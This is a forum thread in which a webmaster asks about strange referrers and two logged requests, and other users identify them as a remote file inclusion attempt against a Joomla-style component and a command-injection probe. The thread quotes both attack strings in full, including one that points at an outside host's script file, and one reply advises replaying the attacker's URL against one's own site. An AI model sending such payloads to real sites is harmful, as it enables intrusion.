Strange Referrers & Website/DB Hack Attempts

[freeflow]

I have noticed many strange entries in my log files lately. Maybe you can explain some of them to me?

-There have been many referrers from adult and non adult sites that have no relation to any websites I have.
Many of them are Russian. What does this mean?

-Are the following entries attempts to hack my website or DB.

my.website//index.php?option=com_directory&Itemid=&mosConfig_absolute_path=http://beltps.by/images/File/zayavlenie/CKrid1.txt??

my.website//index.php?option=com_directory&Itemid=&mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C

If these are hack attempts how do I know if they were successful or not?

 

[LikuiD]

The hacker was trying to launch a file containing php code that would insert his email onto your page
I guess if that had worked with him, he would have tried and launched another file containing a script that would take over your site (creates a backdoor).

The best thing you could do, is follow the first link:
my.website//index.php?option=com_directory&Itemid=&mosConfig_a bsolute_path=http://beltps.by/images/File/zayavlenie/CKrid1.txt??
It won't hurt your site, it only contains php echo commands. If you find the hackers email being displayed infront of you, then you have a serious security problem with your site, and should get somebody to fix it right away

Good Luck

 

[freeflow]

Thanks for the explanation. I tried the first link and it directed to my index page with no changes.

 

[labrocca]

First is a remote file inclusion attempt.

Second is a common script exploit probably Joomla.

These are common scans that are done by bots looking for sites to exploit.

If these are hack attempts how do I know if they were successful or not?

Is your site still up? Any javascript injected into your source? Check also your admin accounts and make sure no additional admins exist.

Security for your site is something you always need to practice and have a backup.